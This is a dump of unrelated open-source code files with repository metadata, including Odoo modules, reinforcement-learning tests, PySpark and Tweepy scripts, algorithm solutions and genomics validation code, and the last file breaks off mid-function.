a8ee7e66a35c09736719e1aa3b92405d4f0be455
|
3b11dc40c7d772fffeb4d8683e5c9791c41f6454
|
/addons/product/wizard/product_price_list.py
|
ae6ce2aea495f5f257f7a39ca139f811bc6bf4f2
|
[] |
no_license
|
Jacky-odoo/Ecobank
|
b986352abac9416ab00008a4abaec2b1f1a1f262
|
5c501bd03a22421f47c76380004bf3d62292f79d
|
refs/heads/main
| 2023-03-09T18:10:45.058530
| 2021-02-25T14:11:12
| 2021-02-25T14:11:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,082
|
py
|
# -*- coding: utf-8 -*-
# Part of Byte. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
class product_price_list(models.TransientModel):
_name = 'product.price_list'
_description = 'Price List'
price_list = fields.Many2one('product.pricelist', 'PriceList', required=True)
qty1 = fields.Integer('Quantity-1', default=1)
qty2 = fields.Integer('Quantity-2', default=5)
qty3 = fields.Integer('Quantity-3', default=10)
qty4 = fields.Integer('Quantity-4', default=0)
qty5 = fields.Integer('Quantity-5', default=0)
@api.multi
def print_report(self):
"""
To get the date and print the report
@return : return report
"""
datas = {'ids': self.env.context.get('active_ids', [])}
res = self.read(['price_list', 'qty1', 'qty2', 'qty3', 'qty4', 'qty5'])
res = res and res[0] or {}
res['price_list'] = res['price_list'][0]
datas['form'] = res
return self.env['report'].get_action([], 'product.report_pricelist', data=datas)
|
[
"francisbnagura@gmail.com"
] |
francisbnagura@gmail.com
|
ca7b25409a21a310db6153351cc71d886ecd96ad
|
66c7b0da6ee27ddce0943945503cdecf199f77a2
|
/hucrl/agent/tests/test_mpc_agent.py
|
a0b361bc8c294920b8fd24c0a2626d18525bcba2
|
[
"MIT"
] |
permissive
|
tzahishimkin/extended-hucrl
|
07609f9e9f9436121bcc64ff3190c966183a2cd9
|
c144aeecba5f35ccfb4ec943d29d7092c0fa20e3
|
refs/heads/master
| 2023-07-09T22:57:28.682494
| 2021-08-24T08:50:16
| 2021-08-24T08:50:16
| 383,819,908
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,789
|
py
|
import copy
import os
import pytest
from rllib.agent import MPCAgent
from rllib.algorithms.mpc import CEMShooting, MPPIShooting, RandomShooting
from rllib.dataset.experience_replay import ExperienceReplay
from rllib.environment import GymEnvironment
from rllib.model.environment_model import EnvironmentModel
from rllib.util.training.agent_training import evaluate_agent
SEED = 0
MAX_ITER = 5
ENVIRONMENT = "VContinuous-CartPole-v0"
env = GymEnvironment(ENVIRONMENT, SEED)
env_model = copy.deepcopy(env)
env_model.reset()
dynamical_model = EnvironmentModel(env_model)
reward_model = EnvironmentModel(env_model, model_kind="rewards")
termination = EnvironmentModel(env_model, model_kind="termination")
GAMMA = 0.99
HORIZON = 5
NUM_ITER = 5
NUM_SAMPLES = 50
NUM_ELITES = 5
KAPPA = 1.0
BETAS = [0.2, 0.8, 0]
memory = ExperienceReplay(max_len=2000, num_steps=1)
value_function = None
@pytest.fixture(params=["random_shooting", "cem_shooting", "mppi_shooting"])
def solver(request):
return request.param
@pytest.fixture(params=[True, False])
def warm_start(request):
return request.param
@pytest.fixture(params=["mean", "zero", "constant"])
def default_action(request):
return request.param
@pytest.fixture(params=[1])
def num_cpu(request):
return request.param
def get_solver(solver_, warm_start_, num_cpu_, default_action_):
if solver_ == "random_shooting":
mpc_solver = RandomShooting(
dynamical_model=dynamical_model,
reward_model=reward_model,
horizon=HORIZON,
gamma=1.0,
num_samples=NUM_SAMPLES,
num_elites=NUM_ELITES,
termination=termination,
terminal_reward=value_function,
warm_start=warm_start_,
default_action=default_action_,
num_cpu=num_cpu_,
)
elif solver_ == "cem_shooting":
mpc_solver = CEMShooting(
dynamical_model=dynamical_model,
reward_model=reward_model,
horizon=HORIZON,
gamma=1.0,
num_iter=NUM_ITER,
num_samples=NUM_SAMPLES,
num_elites=NUM_ELITES,
termination=termination,
terminal_reward=value_function,
warm_start=warm_start_,
default_action=default_action_,
num_cpu=num_cpu_,
)
elif solver_ == "mppi_shooting":
mpc_solver = MPPIShooting(
dynamical_model=dynamical_model,
reward_model=reward_model,
horizon=HORIZON,
gamma=1.0,
num_iter=NUM_ITER,
kappa=KAPPA,
filter_coefficients=BETAS,
num_samples=NUM_SAMPLES,
termination=termination,
terminal_reward=value_function,
warm_start=warm_start_,
default_action=default_action_,
num_cpu=num_cpu_,
)
else:
raise NotImplementedError
return mpc_solver
def test_mpc_solvers(solver, num_cpu):
if num_cpu > 1 and "CI" in os.environ:
return
mpc_solver = get_solver(solver, True, num_cpu, "mean")
agent = MPCAgent(mpc_solver=mpc_solver)
evaluate_agent(
agent, environment=env, num_episodes=1, max_steps=MAX_ITER, render=False
)
def test_mpc_warm_start(solver, warm_start):
mpc_solver = get_solver(solver, warm_start, 1, "mean")
agent = MPCAgent(mpc_solver=mpc_solver)
evaluate_agent(
agent, environment=env, num_episodes=1, max_steps=MAX_ITER, render=False
)
def test_mpc_default_action(solver, default_action):
mpc_solver = get_solver(solver, True, 1, default_action)
agent = MPCAgent(mpc_solver=mpc_solver)
evaluate_agent(
agent, environment=env, num_episodes=1, max_steps=MAX_ITER, render=False
)
|
[
"sebastian.curi@inf.ethz.ch"
] |
sebastian.curi@inf.ethz.ch
|
fbe0ba3fe7398923a4ecff8dc91faf96af99e846
|
28b5eedc39b697186ba9afc42ec544cd0b13c70d
|
/spark/regression/linear_regression.py
|
1619640ed02616968947da8db3b6c2ddc873eeac
|
[] |
no_license
|
arunpa0206/mltrainingtechcovery
|
7915ccac779a186d3f1bfa1f6cebbe5ac2455422
|
ce284c31eefa0468c88c790913532b87a0f77e3a
|
refs/heads/master
| 2022-12-08T23:50:04.415494
| 2021-03-13T08:53:22
| 2021-03-13T08:53:22
| 224,205,026
| 2
| 10
| null | 2022-12-08T02:36:22
| 2019-11-26T13:58:42
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,109
|
py
|
# make pyspark importable as a regular library.
import findspark
# create a SparkSession
from pyspark.sql import SparkSession
spark = SparkSession.builder.getOrCreate()
# load data
data = spark.read.csv('./boston_housing.csv', header=True, inferSchema=True)
# create features vector
print(data.head(5))
feature_columns = data.columns[:-1]
# here we omit the final column
from pyspark.ml.feature import VectorAssembler
assembler = VectorAssembler(inputCols=feature_columns,outputCol="features")
data_2 = assembler.transform(data)
# train/test split
train, test = data_2.randomSplit([0.7, 0.3])
# define the model
from pyspark.ml.regression import LinearRegression
algo = LinearRegression(featuresCol="features", labelCol="medv")
# train the model
model = algo.fit(train)
# evaluation
evaluation_summary = model.evaluate(test)
evaluation_summary.meanAbsoluteError
evaluation_summary.rootMeanSquaredError
evaluation_summary.r2
# predicting values
predictions = model.transform(test)
predictions.select(predictions.columns[13:]).show() # here I am filtering out some columns just for the figure to fit
|
[
"mail_arunn@yahoo.com"
] |
mail_arunn@yahoo.com
|
581e7f1ac73ddc919efb69e776016f838a8ce99e
|
b44b690c96cfbaba35fa3cc32e8da4442adb9fad
|
/Python/1101. The Earliest Moment When Everyone Become Friends.py
|
151cb5ceccfe90d52025d61102662b977a2e5ccc
|
[] |
no_license
|
faisalraza33/leetcode
|
24d610c6884e218719d82a5c79f1695cb6463d68
|
d7cf4ffba14c6f1ff4551634f4002b53dfeae9b7
|
refs/heads/master
| 2022-08-10T02:05:21.932664
| 2022-07-05T09:59:47
| 2022-07-05T09:59:47
| 238,060,131
| 0
| 0
| null | 2020-02-03T20:54:51
| 2020-02-03T20:54:50
| null |
UTF-8
|
Python
| false
| false
| 3,082
|
py
|
# There are n people in a social group labeled from 0 to n - 1. You are given an array logs where logs[i] = [timestampi, x_i, y_i] indicates that x_i and y_i will be friends at the time timestampi.
# Friendship is symmetric. That means if a is friends with b, then b is friends with a. Also, person a is acquainted with a person b if a is friends with b, or a is a friend of someone acquainted with b.
# Return the earliest time for which every person became acquainted with every other person. If there is no such earliest time, return -1.
#
# Example 1:
#
# Input: logs = [[20190101,0,1],[20190104,3,4],[20190107,2,3],[20190211,1,5],[20190224,2,4],[20190301,0,3],[20190312,1,2],[20190322,4,5]], n = 6
# Output: 20190301
# Explanation:
# The first event occurs at timestamp = 20190101 and after 0 and 1 become friends we have the following friendship groups [0,1], [2], [3], [4], [5].
# The second event occurs at timestamp = 20190104 and after 3 and 4 become friends we have the following friendship groups [0,1], [2], [3,4], [5].
# The third event occurs at timestamp = 20190107 and after 2 and 3 become friends we have the following friendship groups [0,1], [2,3,4], [5].
# The fourth event occurs at timestamp = 20190211 and after 1 and 5 become friends we have the following friendship groups [0,1,5], [2,3,4].
# The fifth event occurs at timestamp = 20190224 and as 2 and 4 are already friends anything happens.
# The sixth event occurs at timestamp = 20190301 and after 0 and 3 become friends we have that all become friends.
#
# Example 2:
#
# Input: logs = [[0,2,0],[1,0,1],[3,0,3],[4,1,2],[7,3,1]], n = 4
# Output: 3
#
# Constraints:
#
# 2 <= n <= 100
# 1 <= logs.length <= 10^4
# logs[i].length == 3
# 0 <= timestampi <= 10^9
# 0 <= x_i, y_i <= n - 1
# x_i != y_i
# All the values timestampi are unique.
# All the pairs (x_i, y_i) occur at most one time in the input.
class Solution:
def earliestAcq(self, logs: List[List[int]], n: int) -> int:
# First, we need to sort the events in chronological order.
logs.sort(key=lambda i: i[0])
uf = UnionFind(n)
for ts, x, y in logs:
uf.union(x, y)
if uf.get_count() == 1:
return ts
# More than one groups left, i.e. not everyone is connected.
return -1
class UnionFind:
def __init__(self, size):
self.root = [i for i in range(size)]
self.rank = [1] * size
self.count = size
def find(self, x):
if x == self.root[x]:
return x
self.root[x] = self.find(self.root[x])
return self.root[x]
def union(self, x, y):
rootX = self.find(x)
rootY = self.find(y)
if rootX != rootY:
if self.rank[rootX] > self.rank[rootY]:
self.root[rootY] = rootX
elif self.rank[rootX] < self.rank[rootY]:
self.root[rootX] = rootY
else:
self.root[rootY] = rootX
self.rank[rootX] += 1
self.count -= 1
def get_count(self):
return self.count
|
[
"Hongbo.Miao@outlook.com"
] |
Hongbo.Miao@outlook.com
|
e3c31baedb01d6c813d3b7b845d8f3bcb35ed6e2
|
c1c8b0363bb6dd52115c0aad9298b6573a6ba062
|
/sparse_binary_number.py
|
c051e68a78ba80ce4b6058d4bf0ce5a1b3a8b3d7
|
[
"MIT"
] |
permissive
|
beepscore/sparse_binary_number
|
3f5bd50e772c6e3345e8f57d4317c4a7d8e572d7
|
a89c5b04189c5f7015855075222a0ced4a650db7
|
refs/heads/master
| 2021-01-10T20:28:56.885423
| 2015-05-14T18:38:41
| 2015-05-14T18:38:41
| 33,623,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,631
|
py
|
#!/usr/bin/env python3
def next_sparse(sparse_number):
"""return next larger sparse number
Keyword arguments:
sparse_number -- a sparse number, as defined by is_sparse
This algorithm uses powers of two. Estimated time complexity >= O(log(n)).
"""
# print("sparse_number 0b{0:b}".format(sparse_number))
# Edge case. Handle explicitly for clarity
if sparse_number == 0:
return 1
power_max = twos_power_max(sparse_number)
for power in range(0, power_max):
# print("power", power)
if is_zero_bit_and_no_neighbor_ones(sparse_number, power):
# print("at middle of 000 change to 010")
return sparse_number + (2 ** power)
if is_right_end_of_001(sparse_number, power):
# print("at right of 001 change to 01 followed by all zeros")
sparse_zeroed_low_bits = (sparse_number >> (power + 1)) * (2 ** (power + 1))
# print("sparse_zeroed_low_bits {0:b}".format(sparse_zeroed_low_bits))
return sparse_zeroed_low_bits + (2 ** (power + 1))
return (2 ** (power_max + 1))
def next_sparse_incremental(sparse_number):
"""return next larger sparse number
Keyword arguments:
sparse_number -- a sparse number, as defined by is_sparse
return None if reached internal limit without finding a next sparse.
This algorithm uses "brute force". Estimated time complexity >= O(n).
Increments until possible_sparse is_sparse or reaches limit.
"""
# limit is arbitrary in Python
# http://stackoverflow.com/questions/5470693/python-number-limit
limit = 2 ** 32
for possible_sparse in range(sparse_number + 1, limit):
if is_sparse(possible_sparse):
return possible_sparse
return None
def is_sparse(number):
"""return True if number binary digit 1s have no adjacent 1s.
Keyword arguments:
number -- an integer >= 0
return True if number is 0b1
"""
if number == 0:
return True
if number == 1:
# edge case. List explicitly for clarity. Define to be True
return True
else:
bits = bits_list(number)
# start power_of_2 at 1 so previous_bit index won't be out of list range
for power_of_2 in range(1, len(bits)):
current_bit = bits[power_of_2]
previous_bit = bits[power_of_2 - 1]
if ((current_bit == 1) and (previous_bit == 1)):
# number has two consecutive 1s
return False
return True
def bits_list(number):
"""return list of bits in number
Keyword arguments:
number -- an integer >= 0
"""
# https://wiki.python.org/moin/BitManipulation
if number == 0:
return [0]
else:
# binary_literal string e.g. '0b101'
binary_literal = bin(number)
bits_string = binary_literal.lstrip('0b')
# list comprehension
bits = [int(bit_character) for bit_character in bits_string]
return bits
def bit_at_twos_power(number, exponent):
"""return bit in number at location 2 ** exponent
Keyword arguments:
number -- an integer >= 0
exponent -- a integer >= 0
"""
bits = bits_list(number)
# NOTE: reverse() modifies object, returns None
bits.reverse()
if exponent > (len(bits) - 1):
return 0
else:
return bits[exponent]
def twos_power_max(number):
"""return highest power of two in number
Keyword arguments:
number -- an integer >= 0
"""
bits = bits_list(number)
return len(bits) - 1
def is_zero_bit_and_no_neighbor_ones(number, exponent):
if (bit_at_twos_power(number, exponent) == 0
and is_bit_no_neighbor_ones(number, exponent)):
return True
else:
return False
def is_bit_no_neighbor_ones(number, exponent):
if (is_bit_no_right_one(number, exponent)
and is_bit_no_left_one(number, exponent)):
return True
else:
return False
def is_bit_no_right_one(number, exponent):
if (exponent == 0
or bit_at_twos_power(number, exponent - 1) == 0):
return True
else:
return False
def is_bit_no_left_one(number, exponent):
if bit_at_twos_power(number, exponent + 1) == 0:
return True
else:
return False
def is_right_end_of_001(number, exponent):
if (bit_at_twos_power(number, exponent) == 1
and bit_at_twos_power(number, exponent + 1) == 0
and bit_at_twos_power(number, exponent + 2) == 0):
return True
else:
return False
|
[
"support@beepscore.com"
] |
support@beepscore.com
|
fb013c9f1fb83d9df51c54bbae2e997159c4c7e8
|
059b43c54e69fdca5419d5565c19cc5cb0114a92
|
/__unported__/sale_order_line_analytic/__openerp__.py
|
9edf7867b2603f7b614f424a96badd02f2aaaa26
|
[] |
no_license
|
caiuka/eficent-odoo-addons
|
b3594b0e4d52594c95bb4cea39fdb47933e77d22
|
458df2c04944688c2273885b5d09fe3753e0ca7e
|
refs/heads/master
| 2020-05-29T11:00:45.273732
| 2014-11-06T13:32:26
| 2014-11-06T13:32:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,086
|
py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Eficent (<http://www.eficent.com/>)
# <contact@eficent.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name": "Purchase Requisition Analytic",
"version": "1.0",
"author": "Eficent",
"website": "www.eficent.com",
"category": "Generic Modules/Projects & Services",
"depends": ["analytic", "purchase_requisition"],
"description": """
Organizations often require to integrate purchase requisitions with projects or contracts,
and to find requisitions by searching by it the project/contract code, name or project/contract manager.
This module adds the following features to purchase requisitions:
- Adds the analytic account to the purchase requisition lines,
- When the purchase order is created from the purchase requisition, it copies the analytic account.
- Introduces the possibility to search purchase requisitions by analytic account or by project manager.
- Introduces a new menu entry in Purchasing to list purchase requisition lines.
""",
"init_xml": [
],
"update_xml": [
"purchase_requisition_view.xml",
],
'demo_xml': [
],
'test':[
],
'installable': True,
'active': False,
'certificate': '',
}
|
[
"jordi.ballester@eficent.com"
] |
jordi.ballester@eficent.com
|
ff5dff19f34684d16ef5281dee8f6be0988851a6
|
09652bdf74f8ade0cf56a75c9f716bda9dc6f4ff
|
/server/src/tests/samples/newType2.py
|
31086a4f728f54cbba6821b213aacd9ac83b7663
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
zeronone/pyright
|
b68005063cc3623ae2f572a0fec1d4c7845ec57f
|
d9babcd56b08cb0be024c9d527df333cff5b2b97
|
refs/heads/master
| 2022-11-18T14:04:31.561923
| 2020-07-15T08:49:53
| 2020-07-15T08:49:53
| 278,020,180
| 0
| 0
|
NOASSERTION
| 2020-07-08T07:26:01
| 2020-07-08T07:26:00
| null |
UTF-8
|
Python
| false
| false
| 400
|
py
|
# This sample tests the special-case handle of the multi-parameter
# form of the built-in "type" call.
# pyright: strict
X1 = type("X1", (object,), dict())
X2 = type("X2", (object,), dict())
class A(X1):
...
class B(X2, A):
...
X3 = type(34, (object,))
X4 = type("X4", 34)
# This should generate an error because the second arg is not a tuple of class types.
X5 = type("X5", (3,))
|
[
"erictr@microsoft.com"
] |
erictr@microsoft.com
|
a3d8178d3d9cd5166f52ef11be9060f61c192390
|
47e9f6cef4bfedf81a897d972cecfcf4616ae25f
|
/experiments/base_experiment.py
|
0fb506e33939575baf2a0db46f1c3a9691fa894c
|
[] |
no_license
|
wz139704646/MBRL_on_VAEs
|
1d2b141f5a17746ffa527f3852dfe10bc73dcd27
|
b0e8f66b3ade742445a41d3d5667032a931d94d2
|
refs/heads/main
| 2023-04-09T04:35:34.306860
| 2021-04-27T03:59:54
| 2021-04-27T03:59:54
| 323,389,851
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,633
|
py
|
import abc
class BaseExperiment(metaclass=abc.ABCMeta):
"""base class for all kinds of experiments"""
def __init__(self, exp_configs, hook_before_run=None, hook_after_run=None):
"""initialize the experiment
:param exp_configs: the configurations needed in this experiment
:param hook_before_run: hook function run before the main part run,
take the experiment object itself as the only param
:param hook_after_run: hook function run after the main part run,
take the experiment object itself as the only param
"""
self.exp_configs = exp_configs
self.hook_before_run = hook_before_run
self.hook_after_run = hook_after_run
@abc.abstractmethod
def apply_configs(self):
"""apply the configurations"""
pass
@abc.abstractmethod
def before_run(self, **kwargs):
"""preparations needed be done before run the experiment"""
pass
@abc.abstractmethod
def run(self, **kwargs):
"""run the main part of the experiment"""
pass
@abc.abstractmethod
def after_run(self, **kwargs):
"""cleaning up needed be done after run the experiment"""
pass
def exec(self, **kwargs):
"""execute the entire experiment"""
# apply the experiment configuration
self.apply_configs()
self.before_run(**kwargs)
if self.hook_before_run is not None:
self.hook_before_run(self)
self.run(**kwargs)
if self.hook_after_run is not None:
self.hook_after_run(self)
self.after_run(**kwargs)
|
[
"632291793@qq.com"
] |
632291793@qq.com
|
cfe480d022ad715c760a2b50cc3d97fa9baf03a5
|
5374bd9a9fc8cc07f6966c490a137003ddc64d9b
|
/VEnCode/scripts/validation.py
|
14fa681c8adc40990d15197e91301865df279be4
|
[
"BSD-3-Clause"
] |
permissive
|
AndreMacedo88/VEnCode
|
31f9f545019f62e0af716395a11961515c229394
|
667c777c6ef12c43e993660e5c695d4d6d43385e
|
refs/heads/master
| 2021-01-06T03:55:44.385885
| 2020-11-24T18:05:38
| 2020-11-24T18:05:38
| 90,248,803
| 0
| 1
|
NOASSERTION
| 2020-02-04T22:29:39
| 2017-05-04T10:02:48
|
Python
|
UTF-8
|
Python
| false
| false
| 4,091
|
py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
""" validation.py: file used to cross-validate VEnCodes found using the FANTOM5 data set. """
import os
import sys
import VEnCode.outside_data
file_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(file_dir)
from VEnCode import internals
import VEnCode.internals_extensions as iext
cell_types = {"hips_assay": "hIPS", "hepG2_assay": "hepatocellular carcinoma cell line: HepG2 ENCODE",
"sclc_chr_accessibility_assay": "small cell lung carcinoma cell line",
"sclc_assay": "small cell lung carcinoma cell line", "h82_assay": "small cell lung carcinoma cell line",
"b_lymph_assay": "B lymphoblastoid cell line- GM12878 ENCODE",
"du145_assay": "prostate cancer cell line:DU145",
"pc_3_assay": "prostate cancer cell line:PC-3"}
# Barakat TS, 2018 assays:
# hips_assay = iext.Assay("BarakatTS2018", "sampling", celltype="hIPS", data="core", parsed=False)
validate_with = internals.BarakatTS2018Data(data="core")
hips_assay_val = iext.Assay("BarakatTS2018", "sampling", celltype="hIPS", data="core", parsed=False,
validate_with=validate_with)
hips_assay_val.to_csv()
# Inoue F, 2017 assays:
hepG2_assay = iext.Assay("InoueF2017", "sampling", celltype="hepatocellular carcinoma cell line: HepG2 ENCODE")
hepG2_assay.to_csv()
validate_with = internals.InoueF2017Data()
hepG2_assay_val = iext.Assay("InoueF2017", "sampling", celltype="hepatocellular carcinoma cell line: HepG2 ENCODE",
validate_with=validate_with)
hepG2_assay_val.to_csv()
# Denny SK, 2016 assays:
sclc_chr_accessibility_assay = iext.Assay("DennySK2016", "sampling",
celltype="small cell lung carcinoma cell line")
# Wang X, 2018 assays:
b_lymph_assay = iext.Assay("WangX2018", "sampling", celltype="B lymphoblastoid cell line: GM12878 ENCODE")
b_lymph_assay.to_csv()
validate_with = internals.Bed("WangX2018")
b_lymph_assay_val = iext.Assay("WangX2018", "sampling", celltype="B lymphoblastoid cell line: GM12878 ENCODE",
validate_with=validate_with)
b_lymph_assay_val.to_csv()
# Christensen CL, 2014 assays:
h82_assay = iext.Assay("ChristensenCL2014", "sampling", celltype="small cell lung carcinoma cell line:NCI-H82",
data="H82", parsed=False)
h82_assay.to_csv()
validate_with = internals.ChristensenCL2014Data(data="H82")
h82_assay_val = iext.Assay("ChristensenCL2014", "sampling", celltype="small cell lung carcinoma cell line:NCI-H82",
data="H82", parsed=False, validate_with=validate_with)
h82_assay_val.to_csv()
h82_controls = iext.NegativeControl("ChristensenCL2014", "sampling", data="H82")
h82_controls.to_csv()
# Liu Y, 2017 assays:
du145_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:DU145", parsed=False)
du145_assay.to_csv()
pc_3_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:PC-3", parsed=False)
pc_3_assay.to_csv()
prostate_cancer_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line", parsed=True)
prostate_cancer_assay.to_csv()
validate_with = internals.BroadPeak("LiuY2017")
du145_assay_val = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:DU145", parsed=False,
validate_with=validate_with)
du145_assay_val.to_csv()
validate_with = internals.BroadPeak("LiuY2017")
pc_3_assay_val = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:PC-3", parsed=False,
validate_with=validate_with)
pc_3_assay_val.to_csv()
validate_with = VEnCode.outside_data.BroadPeak("LiuY2017")
prostate_cancer_assay_val = iext.Assay("LiuY2017", "sampling", cell_type="prostate cancer cell line", parsed=True,
validate_with=validate_with)
prostate_cancer_assay_val.to_csv()
lncap_controls = iext.NegativeControl("LiuY2017", "sampling")
lncap_controls.to_csv()
|
[
"andre.lopes.macedo@gmail.com"
] |
andre.lopes.macedo@gmail.com
|
049f94be6d12bfee0f18ebcd3db8d97694c6293e
|
22d8565bf563adcbc38f666dec3b57a1c3fd11f4
|
/build/husky/husky_base/catkin_generated/pkg.installspace.context.pc.py
|
84e0ed79d5a30c4ff0815b97e19969e016fab682
|
[] |
no_license
|
JJHbrams/DynamoP2.0
|
4c4160fcb81b7d6a4f2f0ce10e863fd8aa190a82
|
a0d554b0620ac90ea3388ec3c2f5225baa6237c3
|
refs/heads/master
| 2021-01-03T19:55:42.136766
| 2020-11-11T04:42:43
| 2020-11-11T04:42:43
| 240,215,298
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include;/usr/include".split(';') if "${prefix}/include;/usr/include" != "" else []
PROJECT_CATKIN_DEPENDS = "diagnostic_updater;hardware_interface;husky_msgs;roscpp;sensor_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lhorizon_legacy;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so".split(';') if "-lhorizon_legacy;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so" != "" else []
PROJECT_NAME = "husky_base"
PROJECT_SPACE_DIR = "/home/mrjohd/Kinodynamic_ws/install"
PROJECT_VERSION = "0.4.2"
|
[
"dpswpfrhdid@naver.com"
] |
dpswpfrhdid@naver.com
|
ed05634f40ffd828dade32145311476d092888ca
|
951bd2ae0de80ebb03cdb5214d06c71b617dbdf6
|
/Spark Streaming/TweetRead.py
|
744587f609d2ff6dfff0cce8154dc29f2d82a2bd
|
[] |
no_license
|
albertopformoso/Spark-and-Python-for-Big-Data-with-PySpark
|
c259fdc1d18e43dd4dbdbfa60c8eaff3080a2781
|
8789a0f0b218a46bd9accca27ca8faaea2ed7cdc
|
refs/heads/master
| 2023-02-23T02:12:38.730739
| 2021-01-24T19:26:29
| 2021-01-24T19:26:29
| 330,278,792
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,681
|
py
|
from dotenv import load_dotenv, find_dotenv
import tweepy
from tweepy import OAuthHandler
from tweepy import Stream
from tweepy.streaming import StreamListener
import socket
import json
import os
if len(find_dotenv()) == 0:
raise RuntimeError("Can't find your .env file")
# Set up your credentials
consumer_key = os.getenv('API_KEY')
consumer_secret= os.getenv('API_SECRET_KEY')
access_token = os.getenv('ACCESS_TOKEN')
access_secret = os.getenv('ACCESS_TOKEN_SECRET')
class TweetsListener(StreamListener):
def __init__(self, csocket):
self.client_socket = csocket
def on_data(self, data):
try:
msg = json.loads( data )
print( msg['text'].encode('utf-8') )
self.client_socket.send( msg['text'].encode('utf-8') )
return True
except BaseException as e:
print("Error on_data: %s" % str(e))
return True
def on_error(self, status):
print(status)
return True
def sendData(c_socket):
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_secret)
twitter_stream = Stream(auth, TweetsListener(c_socket))
twitter_stream.filter(track=['guitar'])
if __name__ == "__main__":
s = socket.socket() # Create a socket object
host = "127.0.0.1" # Get local machine name
port = 5555 # Reserve a port for your service.
s.bind((host, port)) # Bind to the port
print("Listening on port: %s" % str(port))
s.listen(5) # Now wait for client connection.
c, addr = s.accept() # Establish connection with client.
print( "Received request from: " + str( addr ) )
sendData( c )
|
[
"albertopformoso@gmail.com"
] |
albertopformoso@gmail.com
|
f6e7f7cf4f1a49aa64ffb503f49ad5eeb1ce2097
|
c6b15c628a185d9f71c91543aac3a90495152c09
|
/Python Unit-Testing Course/.idea/VirtualEnvironment/Scripts/easy_install-3.7-script.py
|
42bf3bd2e8c73d16b39b6f563df885427bd62bc2
|
[] |
no_license
|
reichlj/PythonBsp
|
3e47d3b22b75cf1f67d3e47b83b125a1ddbc518d
|
51c25370495d3a8847f46a9de1bc8e0d811ae5a7
|
refs/heads/master
| 2021-06-12T22:32:15.365906
| 2021-05-08T20:44:01
| 2021-05-08T20:44:01
| 173,499,716
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
#!"C:\dev\PythonBsp\Python Unit-Testing Course\.idea\VirtualEnvironment\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"jakobreichl@gmail.com"
] |
jakobreichl@gmail.com
|
37e98194ea73e6a1e99634dbf212cd5d261da891
|
3fbfabfaaada7b9b77e8a1df8fed4de444070d49
|
/session_10/create_db.py
|
c1c70ca97f2955670dfb74a0e794333f80293c9c
|
[
"MIT"
] |
permissive
|
dravate/spark_python_course
|
df36a561ab2cf8f763dd02655319cd6bf5b7876c
|
519389fdb21d78cd6d19e1ad2f7c782bc1449a83
|
refs/heads/main
| 2023-07-08T06:53:27.635106
| 2021-08-03T14:44:55
| 2021-08-03T14:44:55
| 385,127,461
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
py
|
import os
import sqlite3
db_filename = 'todo.db'
new_db = not os.path.exists(db_filename)
conn = sqlite3.connect(db_filename)
if new_db:
print ("Please create Schema")
else:
print ("DB is already created - mostly the schema exists")
conn.close()
|
[
"sopan.shewale@gmail.com"
] |
sopan.shewale@gmail.com
|
170b7b398ab61f3b24b1986299996fa4ce73ce29
|
d24a6e0be809ae3af8bc8daa6dacfc1789d38a84
|
/other_contests/PAST2019/H.py
|
5b5e04e27939ddcd508e3e8a2e1ea67db3e4dc3d
|
[] |
no_license
|
k-harada/AtCoder
|
5d8004ce41c5fc6ad6ef90480ef847eaddeea179
|
02b0a6c92a05c6858b87cb22623ce877c1039f8f
|
refs/heads/master
| 2023-08-21T18:55:53.644331
| 2023-08-05T14:21:25
| 2023-08-05T14:21:25
| 184,904,794
| 9
| 0
| null | 2023-05-22T16:29:18
| 2019-05-04T14:24:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,782
|
py
|
def solve(n, c_list, q, s_list):
res = 0
dec_list_n = [0] * n
global_dec = 0
odd_dec = 0
global_min = min(c_list)
odd_min = min(c_list[0::2])
for i in range(q):
s = s_list[i]
